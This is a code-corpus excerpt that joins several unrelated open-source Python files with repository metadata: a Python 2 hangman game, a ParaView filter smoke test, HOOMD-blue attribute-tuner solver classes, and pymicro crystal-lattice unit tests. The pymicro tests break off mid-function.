        fname = os.path.join(work_dir, fname)
    matplotlib.pyplot.savefig(fname + '.%s' % type)
    pyplot.hold(False)
    if autoclose:
        matplotlib.pyplot.close('all')
| SystemsBioinformatics/cbmpy | cbmpy/CBPlot.py | Python | gpl-3.0 | 8,194 | [
"PySCeS"
] | 00cfcb3d85e1a46f62bbb42f92cad2f0b85fa373c67b0eac6ba4bfbdcaff66bb |
import random
HANGMANPICS = ['''
+---+
| |
|
|
|
|
======''','''
+---+
| |
O |
|
|
|
======''','''
+---+
| |
O |
| |
|
|
======''','''
+---+
| |
O |
/| |
|
|
======''','''
+---+
| |
O |
/|\ |
|
|
======''','''
+---+
| |
O |
/|\ |
/ |
|
======''','''
+---+
| |
O |
/|\ |
/ \ |
|
======''']
#These words were shamelessly stolen from:
# https://answers.yahoo.com/question/index?qid=20080510101849AAN28jL
words = 'abruptly affix askew axiom azure bagpipes bandwagon banjo \
bayou bikini blitz bookworm boxcar boxful buckaroo buffalo buffoon \
cobweb croquet daiquiri disavow duplex dwarves equip exodus fishhook fixable \
foxglove galaxy galvanize gazebo gizmo glowworm guffaw haiku haphazard hyphen \
icebox injury ivory ivy jaundice jawbreaker jaywalk jazzy jigsaw jiujitsu jockey \
jovial joyful juicy jumbo kazoo keyhole khaki kilobyte kiosk kiwifruit knapsack \
larynx luxury marquis megahertz microwave mystify nightclub nowadays numbskull \
ovary oxidize oxygen pajama peekaboo pixel pizazz pneumonia polka quartz quiz \
quorum razzmatazz rhubarb rickshaw schizophrenia sphinx spritz squawk subway \
swivel topaz unknown unworthy unzip uptown vaporize vixen vodka vortex walkway \
waltz wavy waxy wheezy whiskey whomever wimpy wizard woozy xylophone yachtsman \
yippee youthful zephyr zigzag zilch zodiac zombie'.split()
def get_random_word(word_list):
    """Pick one word at random from *word_list* and return it."""
    chosen = random.choice(word_list)
    return chosen
def display_board(HANGMANPICS, missed_letters,
                  correct_letters, secret_word):
    """Draw the gallows, the missed letters and the partially guessed word.

    Python 2 code: trailing commas on `print` suppress the newline.
    """
    # one gallows picture per missed letter
    print HANGMANPICS[len(missed_letters)]
    print
    print 'Missed letters:',
    for letter in missed_letters:
        print letter,
    print
    # show guessed letters in place, underscores for the rest
    for letter in secret_word:
        if letter in correct_letters:
            print letter,
        else:
            print '_',
    print
# Write a function called get_guess(already_guessed).
# It will take as input a string of already guessed letters.
# Ask the user to type in a letter.
# Make sure that the following things are True:
# 1. If they enter more than one letter, tell them to enter a single letter
# 2. If they enter an already guessed letter, tell them to pick a different one.
# 3. If they pick something that is NOT A LETTER, tell them to pick a letter!
# Hint: The function .isalpha() will help you here.
# Loop until they pick something that is valid, then return that letter.
def get_guess(already_guessed):
    """Prompt until the player enters a single, new, alphabetic letter.

    :param already_guessed: string of letters guessed so far
    :returns: the accepted lower-case letter
    """
    while True:
        guess = raw_input('Please guess a letter: ').lower()
        if len(guess) > 1:
            print 'Please guess only a SINGLE letter.'
        elif guess in already_guessed:
            print 'Please guess a letter that hasn\'t been already guessed.'
        elif not guess.isalpha():
            print 'Please guess a LETTER!'
        else:
            return guess
# Will return True or False depending on whether they want to play again
def play_again():
    """Ask whether to start another round; True on any answer starting with 'y'."""
    answer = raw_input("Do you want to play again (yes/no)? ")
    return answer.lower().startswith('y')
###################################################################################################
def main():
    """Run the interactive hangman game loop (Python 2)."""
    print 'H A N G M A N'
    missed_letters = ''
    correct_letters = ''
    secret_word = get_random_word(words)  # GET THE RANDOM WORD
    game_is_done = False  # flag variable: True once the round is won or lost
    while True:
        display_board(HANGMANPICS, missed_letters,
                      correct_letters, secret_word)
        guess = get_guess(missed_letters + correct_letters)
        # CHECK IF THE GUESS IS CORRECT
        if guess in secret_word:
            correct_letters += guess
            # CHECK TO SEE IF I HAVE WON!
            found_all_letters = True
            for letter in secret_word:
                if letter not in correct_letters:
                    found_all_letters = False
                    break
            if found_all_letters:
                print 'Yes! The secret word was {}! You have won.'.format(secret_word)
                game_is_done = True
        # CHECK TO SEE IF THE GUESS IS INCORRECT
        else:
            missed_letters += guess
            # CHECK TO SEE IF I HAVE LOST (6 misses exhausts the gallows art)
            if len(missed_letters) >= 6:
                display_board(HANGMANPICS, missed_letters,
                              correct_letters, secret_word)
                print 'You lost! The secret word was {}!'.format(secret_word)
                game_is_done = True
        if game_is_done:
            if play_again():
                # RESET THE GAME
                missed_letters = ''
                correct_letters = ''
                secret_word = get_random_word(words)
                game_is_done = False
            else:
                print 'Have a wonderful day!'
                break

main()
| Nethermaker/school-projects | intro/hangman.py | Python | mit | 5,211 | [
"Galaxy"
] | 795d4bf165d8f6e7320ebb849be7299eb2c11e87324e2e4692c91b634ad2e2eb |
# Ensure paraview.simple is loaded (no-op if a hosting ParaView session
# already imported it; otherwise pull in the whole simple namespace).
try: paraview.simple
except: from paraview.simple import *

# Stop ParaView from resetting the camera every time a new source is shown.
paraview.simple._DisableFirstRenderCameraReset()

# Smoke test: instantiating the filter must succeed.
GraphToPolyData()
| jeromevelut/Peavip | Testing/GraphToPolyData.py | Python | gpl-3.0 | 128 | [
"ParaView"
] | df0612cc86a1f71e8af2eab063c55a991483ebde6f23ebc1a5850a0e19a86a55 |
# Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""Implement tuner utility classes."""
from math import isclose
from abc import ABCMeta, abstractmethod
class _TuneDefinition(metaclass=ABCMeta):
    """Internal class for defining y = f(x) relations.

    This class is designed to allow for tuning x to achieve a specified value
    for y over a domain T. It abstracts over getting and setting x and getting
    y. The class also provides helper functions for ensuring x is always set to
    a value within the specified domain.
    """

    def __init__(self, target, domain=None):
        # the ``domain`` property setter validates the value
        self.domain = domain
        self._target = target

    def in_domain(self, value):
        """Check whether a value is in the domain.

        Args:
            value (``any``): A value that can be compared to the minimum and
                maximum of the domain.

        Returns:
            bool: Whether the value is in the domain of x.
        """
        if self.domain is None:
            return True
        else:
            lower_bound, upper_bound = self.domain
            # a bound of None means "unbounded" on that side
            return ((lower_bound is None or lower_bound <= value)
                    and (upper_bound is None or value <= upper_bound))

    def clamp_into_domain(self, value):
        """Return the closest value within the domain.

        Args:
            value (``any``): A value of the same type as x.

        Returns:
            The value clamped within the domains of x. Clamping here refers to
            returning the value or minimum or maximum of the domain if value is
            outside the domain.
        """
        if self._domain is None:
            return value
        else:
            lower_bound, upper_bound = self.domain
            if lower_bound is not None and value < lower_bound:
                return lower_bound
            elif upper_bound is not None and value > upper_bound:
                return upper_bound
            else:
                return value

    @property
    def x(self):
        """The dependent variable.

        Can be set. When set the setting value is clamped within the provided
        domain. See `clamp_into_domain` for further explanation.
        """
        return self._get_x()

    @x.setter
    def x(self, value):
        return self._set_x(self.clamp_into_domain(value))

    @property
    def max_x(self):
        """Maximum allowed x value (``None`` when unbounded)."""
        if self.domain is None:
            return None
        else:
            return self.domain[1]

    @property
    def min_x(self):
        """Minimum allowed x value (``None`` when unbounded)."""
        if self.domain is None:
            return None
        else:
            return self.domain[0]

    @property
    def y(self):
        """The independent variable, and is unsettable."""
        return self._get_y()

    @property
    def target(self):
        """The targetted y value, can be set."""
        return self._get_target()

    @target.setter
    def target(self, value):
        self._set_target(value)

    @abstractmethod
    def _get_x(self):
        pass

    # BUGFIX: the abstract signature previously omitted ``value`` even though
    # every caller invokes ``self._set_x(value)`` and every concrete override
    # accepts it; a subclass written against the old abstract signature would
    # have failed at call time.
    @abstractmethod
    def _set_x(self, value):
        pass

    @abstractmethod
    def _get_y(self):
        pass

    def _get_target(self):
        return self._target

    def _set_target(self, value):
        self._target = value

    @property
    def domain(self):
        """tuple[``any``, ``any``]: A tuple pair of the minimum and maximum \
        accepted values of x.

        When, the domain is ``None`` then any value of x is accepted. Either
        the minimum or maximum can be set to ``None`` as well which means
        there is no maximum or minimum. The domain is used to wrap values
        within the specified domain when setting x.
        """
        if self._domain is not None:
            return tuple(self._domain)
        else:
            return None

    @domain.setter
    def domain(self, value):
        if value is not None and not len(value) == 2:
            raise ValueError("domain must be a sequence of length two.")
        self._domain = value

    def __hash__(self):
        raise NotImplementedError("This object is not hashable.")

    def __eq__(self, other):
        raise NotImplementedError("This object is not equatable.")
class ManualTuneDefinition(_TuneDefinition):
    """Define a tunable y = f(x) relationship from user supplied callables.

    Made to be used with `SolverStep` subclasses. Here y represents a
    dependent variable of x. In general, x and y should be of type `float`,
    but specific `SolverStep` subclasses may accept other types.

    A returned y of ``None`` is a special case signalling that the value is
    currently inaccessible or would be invalid; `SolverStep` objects handle
    this automatically and skip the tunable. Because of this internal check,
    the ``y`` property should report consistently when queried multiple times
    within a timestep.

    Args:
        get_y (``callable``): A callable that gets the current value for y.
        target (``any``): The target y value to approach.
        get_x (``callable``): A callable that gets the current value for x.
        set_x (``callable``): A callable that sets the current value for x.
        domain (`tuple` [``any``, ``any``], optional): A tuple pair of the
            minimum and maximum accepted values of x, defaults to `None`
            (any x accepted). Either entry may itself be `None` for a
            one-sided bound. Values are clamped into the domain when x is
            set.

    Note:
        Placing domain restrictions on x can make the target y impossible to
        converge to, in which case the owning `SolverStep` never reports the
        tunable as solved.
    """

    def __init__(self, get_y, target, get_x, set_x, domain=None):
        if domain is not None and len(domain) != 2:
            raise ValueError("domain must be a sequence of length two.")
        self._user_get_x = get_x
        self._user_set_x = set_x
        self._user_get_y = get_y
        self._target = target
        self._domain = domain

    def _get_x(self):
        return self._user_get_x()

    def _set_x(self, value):
        return self._user_set_x(value)

    def _get_y(self):
        return self._user_get_y()

    def _get_target(self):
        return self._target

    def _set_target(self, value):
        self._target = value

    def __hash__(self):
        """Compute a hash of the tune definition."""
        return hash((self._user_get_x, self._user_set_x, self._user_get_y,
                     self._target))

    def __eq__(self, other):
        """Test for equality."""
        mine = (self._user_get_x, self._user_set_x,
                self._user_get_y, self._target)
        theirs = (other._user_get_x, other._user_set_x,
                  other._user_get_y, other._target)
        return mine == theirs
class SolverStep(metaclass=ABCMeta):
    """Abstract base class for "solving" stepwise equations of f(x) = y.

    Subclasses provide a single method, `SolverStep.solve_one`, which advances
    the solve of one variable relationship by a single iteration. Combine a
    subclass with `hoomd.tune.ManualTuneDefinition` objects to tune attributes
    with a functional relation.

    Note:
        A `SolverStep` object requires manual iteration to converge. This
        supports the use case where the dependent quantity (y) must be
        re-measured after running the simulation for some time between
        iterations. `SolverStep` objects can be used in `hoomd.custom.Action`
        subclasses for user defined tuners and updaters.
    """

    @abstractmethod
    def solve_one(self, tunable):
        """Takes in a tunable object and attempts to solve x for a specified y.

        Args:
            tunable (`hoomd.tune.ManualTuneDefinition`): A tunable object that
                represents a relationship of f(x) = y.

        Returns:
            bool : Whether or not the tunable converged to the target.
        """
        pass

    def _solve_one_internal(self, tunable):
        # A y of None means the quantity is currently unavailable: report the
        # tunable as unsolved without invoking the concrete solver.
        if tunable.y is None:
            return False
        return self.solve_one(tunable)

    def solve(self, tunables):
        """Iterates towards a solution for a list of tunables.

        Tunables whose y is currently ``None`` are skipped; a skipped tunable
        counts as not tuned, so `solve` returns `False` for that iteration.

        Args:
            tunables (list[`hoomd.tune.ManualTuneDefinition`]): A list of
                tunable objects that represent a relationship f(x) = y.

        Returns:
            bool:
                Returns whether or not all tunables were considered tuned by
                the object.
        """
        # Materialize the per-tunable results first so every tunable is
        # stepped this iteration; all() alone would short circuit.
        outcomes = [self._solve_one_internal(tunable) for tunable in tunables]
        return all(outcomes)
class ScaleSolver(SolverStep):
    """Solves equations of f(x) = y using a ratio of the current y with the \
    target.

    Args:
        max_scale (`float`, optional): The maximum amount to scale the
            current x value with, defaults to 2.0.
        gamma (`float`, optional): nonnegative real number used to dampen
            or increase the rate of change in x. ``gamma`` is added to the
            numerator and denominator of the ``y / target`` ratio. Larger
            values of ``gamma`` lead to smaller changes while a ``gamma`` of 0
            leads to scaling x by exactly the ``y / target`` ratio.
        correlation (`str`, optional): Defines whether the relationship
            between x and y is of a positive or negative correlation, defaults
            to 'positive'. This determines which direction to scale x in for a
            given y.
        tol (`float`, optional): The absolute tolerance for convergence of
            y, defaults to 1e-5.

    Note:
        This solver is only usable when quantities are strictly positive.
    """

    def __init__(self,
                 max_scale=2.0,
                 gamma=2.0,
                 correlation='positive',
                 tol=1e-5):
        self.max_scale = max_scale
        self.gamma = gamma
        self.correlation = correlation.lower()
        self.tol = tol

    def solve_one(self, tunable):
        """Solve one step."""
        x = tunable.x
        y = tunable.y
        target = tunable.target
        # already within tolerance: nothing to do
        if abs(y - target) <= self.tol:
            return True
        positive = self.correlation == 'positive'
        if y > 0:
            # damped ratio of target to current value; the direction depends
            # on the sign of the x-y correlation
            if positive:
                scale = (self.gamma + target) / (y + self.gamma)
            else:
                scale = (y + self.gamma) / (self.gamma + target)
        else:
            # y was zero (or negative): nudge x by a fixed factor instead,
            # downwards for positive correlation, upwards otherwise
            scale = 0.1 if positive else 1.1
        # never scale by more than max_scale in one step
        scale = min(scale, self.max_scale)
        # Ensures we stay within the tunable's domain (i.e. we don't take on
        # values too high or low).
        tunable.x = tunable.clamp_into_domain(scale * x)
        return False

    def __eq__(self, other):
        """Test for equality."""
        if not isinstance(other, SolverStep):
            return NotImplemented
        if not isinstance(other, type(self)):
            return False
        attrs = ('max_scale', 'gamma', 'correlation', 'tol')
        return all(getattr(self, name) == getattr(other, name)
                   for name in attrs)
class SecantSolver(SolverStep):
    """Solves equations of f(x) = y using the secant method.

    Args:
        gamma (`float`, optional): real number between 0 and 1 used to
            dampen the rate of change in x. ``gamma`` scales the corrections to
            x each iteration. Larger values of ``gamma`` lead to larger changes
            while a ``gamma`` of 0 leads to no change in x at all.
        tol (`float`, optional): The absolute tolerance for convergence of
            y, defaults to 1e-5.

    Note:
        Tempering the solver with a smaller than 1 ``gamma`` value is crucial
        for numeric stability. If instability is found, then lowering ``gamma``
        accordingly should help.
    """

    # number of consecutive "y did not change" iterations tolerated before
    # x is nudged, see _handle_static_y
    _max_allowable_counter = 3

    def __init__(self, gamma=0.9, tol=1e-5):
        self.gamma = gamma
        # tunable -> (previous x, previous f(x) = y - target)
        self._previous_pair = dict()
        self.tol = tol
        # tunable -> count of consecutive iterations with unchanged y
        self._counters = dict()

    def solve_one(self, tunable):
        """Solve one step."""
        # start tuning new tunable
        if tunable not in self._previous_pair:
            self._initialize_tuning(tunable)
            return False
        x, y, target = tunable.x, tunable.y, tunable.target
        # check for convergence
        if abs(y - target) <= self.tol:
            return True
        old_x, old_f_x = self._previous_pair[tunable]
        # Attempt to find the new value of x using the standard secant formula.
        # We use f(x) = y - target since this is the root we are searching for.
        f_x = y - target
        try:
            dxdf = (x - old_x) / (f_x - old_f_x)
        except ZeroDivisionError:  # Implies that y has not changed
            # Given the likelihood for use cases in HOOMD that this implies
            # a lack of equilibriation of y or too small of a change.
            new_x = self._handle_static_y(tunable, x, old_x)
        else:
            # We can use the secant formula
            self._counters[tunable] = 0
            new_x = x - (self.gamma * f_x * dxdf)
        # We need to check if the new x is essentially the same as the previous.
        # If this is the case we should not update the entry in
        # `self._previous_pair` as this would prevent all future tunings. To
        # compare we must first clamp the value of the new x appropriately.
        new_x = tunable.clamp_into_domain(new_x)
        if not isclose(new_x, x):
            # We only update x and the previous tunable information when x
            # changes. This is to allow for us gracefully handling when y is the
            # same multiple times.
            tunable.x = new_x
            self._previous_pair[tunable] = (x, y - target)
        return False

    def _initialize_tuning(self, tunable):
        """Called when a tunable is passed for the first time to solver.

        Perturbs x to allow for the calculation of df/dx.
        """
        x = tunable.x
        # try +10% first, fall back to -10% when the domain clamps it away
        new_x = tunable.clamp_into_domain(x * 1.1)
        if new_x == x:
            new_x = tunable.clamp_into_domain(x * 0.9)
            if new_x == x:
                raise RuntimeError("Unable to perturb x for secant solver.")
        tunable.x = new_x
        self._previous_pair[tunable] = (x, tunable.y - tunable.target)

    def _handle_static_y(self, tunable, x, old_x):
        """Handles when y is constant for multiple calls to solve_one.

        We do nothing for the first SecantSolver._max_allowable_counter
        consequetive times, but afterwards we attempt to perturb x in the
        direction of last change, and reset the counter.

        This method is useful to handle y that vary slowly with x (such as move
        sizes and acceptance rates for low density HPMC simulations), or cases
        where y takes a while to equilibriate.
        """
        counter = self._counters.get(tunable, 0) + 1
        if counter > self._max_allowable_counter:
            # We nudge x in the direction of previous change.
            self._counters[tunable] = 0
            return tunable.clamp_into_domain(x + ((x - old_x) * 0.5))
        else:
            self._counters[tunable] = counter
            return x

    def __eq__(self, other):
        """Test for equality."""
        if not isinstance(other, SolverStep):
            return NotImplemented
        if not isinstance(other, type(self)):
            return False
        return all(
            getattr(self, attr) == getattr(other, attr)
            for attr in ('gamma', 'tol', '_counters', '_previous_pair'))
| joaander/hoomd-blue | hoomd/tune/attr_tuner.py | Python | bsd-3-clause | 16,562 | [
"HOOMD-blue"
] | 7691e6988610a836524ddb50a2523396877eac4c440c9fdb72ad2e10f8a98219 |
import unittest
import numpy as np
from math import pi, cos, sin, acos, atan
from pymicro.crystal.lattice import Lattice, CrystallinePhase, Symmetry, HklObject, HklDirection, HklPlane, SlipSystem
class LatticeTests(unittest.TestCase):
    """Unit tests for pymicro's Lattice class."""

    def setUp(self):
        print('testing the Lattice class')

    def test_equality(self):
        """Lattices with the same matrix and symmetry must compare equal."""
        l1 = Lattice.cubic(0.5)
        a = np.array([[0.5, 0., 0.],
                      [0., 0.5, 0.],
                      [0., 0., 0.5]])
        l2 = Lattice(a, symmetry=Symmetry.cubic)
        self.assertEqual(l1, l2)

    def test_cubic(self):
        """Lattice.cubic builds a diagonal matrix from the lattice parameter."""
        a = np.array([[0.5, 0., 0.],
                      [0., 0.5, 0.],
                      [0., 0., 0.5]])
        l = Lattice.cubic(0.5)
        for i in range(0, 3):
            for j in range(0, 3):
                self.assertEqual(l.matrix[i][j], a[i][j])

    def test_volume(self):
        """The unit cell volume of a cubic lattice is a**3."""
        l = Lattice.cubic(0.5)
        self.assertAlmostEqual(l.volume(), 0.125)

    def test_from_symbol(self):
        """Lattice.from_symbol('Al') yields cubic aluminium, a = 0.40495 nm."""
        al = Lattice.from_symbol('Al')
        for i in range(0, 3):
            self.assertAlmostEqual(al._lengths[i], 0.40495, 4)
            self.assertEqual(al._angles[i], 90.0)

    def test_reciprocal_lattice(self):
        """Check the reciprocal basis vectors of a monoclinic lattice."""
        Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
        [astar, bstar, cstar] = Mg2Si.reciprocal_lattice()
        self.assertAlmostEqual(astar[0], 0.678, 3)
        self.assertAlmostEqual(astar[1], 0., 3)
        self.assertAlmostEqual(astar[2], 0., 3)
        self.assertAlmostEqual(bstar[0], 0., 3)
        self.assertAlmostEqual(bstar[1], 2.469, 3)
        self.assertAlmostEqual(bstar[2], 0., 3)
        self.assertAlmostEqual(cstar[0], 0.420, 3)
        self.assertAlmostEqual(cstar[1], 0., 3)
        self.assertAlmostEqual(cstar[2], 1.464, 3)
class CrystallinePhaseTests(unittest.TestCase):
    """Unit tests for pymicro's CrystallinePhase class."""

    def setUp(self):
        print('testing the CrystallinePhase class')

    def test_init(self):
        """A freshly created phase defaults to id 1 and keeps the given name."""
        phase = CrystallinePhase(name='test')
        self.assertEqual(phase.phase_id, 1)
        self.assertEqual(phase.name, 'test')
class HklDirectionTests(unittest.TestCase):
    """Unit tests for pymicro's HklDirection class."""

    def setUp(self):
        print('testing the HklDirection class')

    def test_angle_between_directions(self):
        """Angles between low-index directions in a cubic lattice."""
        d111 = HklDirection(1, 1, 1)
        d110 = HklDirection(1, 1, 0)
        d100 = HklDirection(1, 0, 0)
        dm111 = HklDirection(-1, 1, 1)
        self.assertAlmostEqual(d100.angle_with_direction(d110) * 180 / np.pi, 45.0)
        self.assertAlmostEqual(d111.angle_with_direction(d110) * 180 / np.pi, 35.26, 2)
        self.assertAlmostEqual(d111.angle_with_direction(dm111) * 180 / np.pi, 70.528, 2)

    def test_tetragonal_direction(self):
        """Cartesian components of directions in a bct lattice."""
        bct = Lattice.body_centered_tetragonal(0.28, 0.40)
        d111 = HklDirection(1, 1, 1, bct)
        d110 = HklDirection(1, 1, 0, bct)
        self.assertAlmostEqual(d111.direction()[0], 0.49746834, 5)
        self.assertAlmostEqual(d111.direction()[1], 0.49746834, 5)
        self.assertAlmostEqual(d111.direction()[2], 0.71066905, 5)
        self.assertAlmostEqual(d110.direction()[0], 0.707106781, 5)
        self.assertAlmostEqual(d110.direction()[1], 0.707106781, 5)
        self.assertAlmostEqual(d110.direction()[2], 0.0, 5)

    def test_tetragonal_direction2(self):
        """[111] direction of tetragonal ZrO2 against a hand-computed vector."""
        ZrO2 = Lattice.tetragonal(0.364, 0.527)
        d = HklDirection(1, 1, 1, ZrO2)
        # c/a = 0.527/0.364 = 1.448, then normalize
        target = np.array([1., 1., 1.448])
        target /= np.linalg.norm(target)
        self.assertAlmostEqual(d.direction()[0], target[0], 4)
        self.assertAlmostEqual(d.direction()[1], target[1], 4)
        self.assertAlmostEqual(d.direction()[2], target[2], 4)

    def test_angle_with_directions(self):
        """Compare angle_with_direction with the analytic orthorhombic formula."""
        (a, b, c) = (1.022, 0.596, 0.481)
        olivine = Lattice.orthorhombic(a, b, c)
        (h1, k1, l1) = (1., 1., 1.)
        (h2, k2, l2) = (3., 3., 2.)
        d1 = HklDirection(h1, k1, l1, olivine)
        d2 = HklDirection(h2, k2, l2, olivine)
        # compare with formula in orthorhombic lattice, angle must be 6.589 degrees
        angle = np.arccos(((h1 * h2 * a ** 2) + (k1 * k2 * b ** 2) + (l1 * l2 * c ** 2)) /
                          (np.sqrt(a ** 2 * h1 ** 2 + b ** 2 * k1 ** 2 + c ** 2 * l1 ** 2) *
                           np.sqrt(a ** 2 * h2 ** 2 + b ** 2 * k2 ** 2 + c ** 2 * l2 ** 2)))
        self.assertAlmostEqual(d1.angle_with_direction(d2), angle)

    def test_skip_higher_order(self):
        """skip_higher_order removes multiples of lower-index planes in a zone."""
        uvw = HklDirection(3, 3, 1)
        hkl_planes = uvw.find_planes_in_zone(max_miller=3)
        self.assertEqual(len(hkl_planes), 18)
        hkl_planes2 = HklObject.skip_higher_order(hkl_planes)
        self.assertEqual(len(hkl_planes2), 7)

    def test_4indices_representation(self):
        """Round-trip conversions between 3-index and 4-index (hexagonal) notation."""
        u, v, w = HklDirection.four_to_three_indices(2, -1, -1, 0)
        self.assertEqual(u, 1)
        self.assertEqual(v, 0)
        self.assertEqual(w, 0)
        u, v, w = HklDirection.four_to_three_indices(1, 0, -1, 1)
        self.assertEqual(u, 2)
        self.assertEqual(v, 1)
        self.assertEqual(w, 1)
        U, V, T, W = HklDirection.three_to_four_indices(1, 1, 1)
        self.assertEqual(U, 1)
        self.assertEqual(V, 1)
        self.assertEqual(T, -2)
        self.assertEqual(W, 3)
        U, V, T, W = HklDirection.three_to_four_indices(2, 1, 0)
        self.assertEqual(U, 1)
        self.assertEqual(V, 0)
        self.assertEqual(T, -1)
        self.assertEqual(W, 0)
class HklPlaneTests(unittest.TestCase):
def setUp(self):
print('testing the HklPlane class')
self.hex = Lattice.hexagonal(0.2931, 0.4694) # nm
def test_equality(self):
p1 = HklPlane(1, 1, 1)
p2 = HklPlane(1, 1, 1)
p3 = HklPlane(-1, 1, 1)
self.assertEqual(p1, p2)
self.assertTrue(p1 == p2)
self.assertTrue(p1 != p3)
def test_HklPlane(self):
p = HklPlane(1, 1, 1)
n = p.normal()
self.assertEqual(np.linalg.norm(n), 1)
def test_get_family(self):
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic)), 3)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic)), 4)
self.assertEqual(len(HklPlane.get_family('111', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic)), 6)
self.assertEqual(len(HklPlane.get_family('011', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic)), 12)
self.assertEqual(len(HklPlane.get_family('112', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic)), 24)
self.assertEqual(len(HklPlane.get_family('123', crystal_structure=Symmetry.cubic, include_friedel_pairs=True)), 48)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('010', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 4)
self.assertEqual(len(HklPlane.get_family([1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([-1, 0, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, 1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family([0, -1, 2], crystal_structure=Symmetry.tetragonal, include_friedel_pairs=True)), 8)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal)), 1)
self.assertEqual(len(HklPlane.get_family('001', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 2)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family('100', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal)), 3)
self.assertEqual(len(HklPlane.get_family((1, 0, -1, 0), crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal)), 6)
self.assertEqual(len(HklPlane.get_family('102', crystal_structure=Symmetry.hexagonal, include_friedel_pairs=True)), 12)
def test_multiplicity(self):
"""Int Tables of Crystallography Vol. 1 p 32."""
self.assertEqual(HklPlane(1, 0, 0).multiplicity(symmetry=Symmetry.cubic), 6)
for h in range(1, 4):
self.assertEqual(HklPlane(h, 0, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(0, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(-h, h, 0).multiplicity(symmetry=Symmetry.tetragonal), 4)
self.assertEqual(HklPlane(h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-h, h, 1).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 0, 1).multiplicity(symmetry=Symmetry.tetragonal), 2)
self.assertEqual(HklPlane(1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 0, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, 1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(0, -1, 2).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(-1, 2, 0).multiplicity(symmetry=Symmetry.tetragonal), 8)
self.assertEqual(HklPlane(1, 2, 3).multiplicity(symmetry=Symmetry.tetragonal), 16)
def test_HklPlane_normal(self):
ZrO2 = Lattice.tetragonal(3.64, 5.27)
p = HklPlane(1, 1, 1, ZrO2)
n = p.normal()
self.assertAlmostEqual(n[0], 0.635, 3)
self.assertAlmostEqual(n[1], 0.635, 3)
self.assertAlmostEqual(n[2], 0.439, 3)
def test_110_normal_monoclinic(self):
"""Testing (110) plane normal in monoclinic crystal structure.
This test comes from
http://www.mse.mtu.edu/~drjohn/my3200/stereo/sg5.html
corrected for a few errors in the html page.
In this test, the lattice is defined with the c-axis aligned with the Z direction of the Cartesian frame.
"""
Mg2Si = Lattice.from_parameters(1.534, 0.405, 0.683, 90., 106., 90., x_aligned_with_a=False)
a = Mg2Si.matrix[0]
b = Mg2Si.matrix[1]
c = Mg2Si.matrix[2]
self.assertAlmostEqual(a[0], 1.475, 3)
self.assertAlmostEqual(a[1], 0., 3)
self.assertAlmostEqual(a[2], -0.423, 3)
self.assertAlmostEqual(b[0], 0., 3)
self.assertAlmostEqual(b[1], 0.405, 3)
self.assertAlmostEqual(b[2], 0., 3)
self.assertAlmostEqual(c[0], 0., 3)
self.assertAlmostEqual(c[1], 0., 3)
self.assertAlmostEqual(c[2], 0.683, 3)
p = HklPlane(1, 1, 1, Mg2Si)
Gc = p.scattering_vector()
self.assertAlmostEqual(Gc[0], 1.098, 3)
self.assertAlmostEqual(Gc[1], 2.469, 3)
self.assertAlmostEqual(Gc[2], 1.464, 3)
self.assertAlmostEqual(p.interplanar_spacing(), 0.325, 3)
Ghkl = np.dot(Mg2Si.matrix, Gc)
self.assertEqual(Ghkl[0], 1.) # h
self.assertEqual(Ghkl[1], 1.) # k
self.assertEqual(Ghkl[2], 1.) # l
def test_scattering_vector(self):
Fe_fcc = Lattice.face_centered_cubic(0.287) # FCC iron
